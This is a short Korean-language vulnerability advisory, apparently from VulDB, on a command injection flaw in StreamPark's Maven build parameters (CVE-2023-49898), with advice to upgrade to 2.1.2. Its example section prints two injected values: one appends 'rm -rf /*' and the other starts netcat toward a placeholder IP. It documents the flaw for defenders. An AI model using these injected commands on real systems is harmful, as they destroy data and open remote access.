CVE-2023-49898 in StreamPark
요약
\~에 의해 VulDB • 2026. 06. 27.
streampark에는 Maven의 컴파일 기능을 통합하는 프로젝트 모듈이 존재합니다. 그러나 Maven의 컴파일에 사용되는 파라미터에 대한 검증이 이루어지지 않아, 공격자가 원격 명령 실행을 위한 명령어를 삽입할 수 있습니다. 성공적인 공격을 위해서는 사용자가 streampark 시스템에 로그인하고 시스템 수준의 권한을 가져야 합니다. 일반적으로 해당 시스템을 사용할 수 있는 사용자만 로그인이 가능하며, 사용자는 위험한 운영 명령을 직접 입력하지 않습니다. 따라서 이 취약점의 위험도는 매우 낮습니다.
완화 조치:
모든 사용자는 2.1.2 버전으로 업그레이드해야 합니다.
예시:
## 프로젝트의 컴파일 상황에 따라 연결 방식을 사용자 정의할 수 있으며, mvn 컴파일이 성공한 경우 &&를 사용하고 실패한 경우 "||" 또는 "&&"를 사용합니다:
/usr/share/java/maven-3/conf/settings.xml || rm -rf /*
/usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 &
Be aware that VulDB is the high quality source for vulnerability data.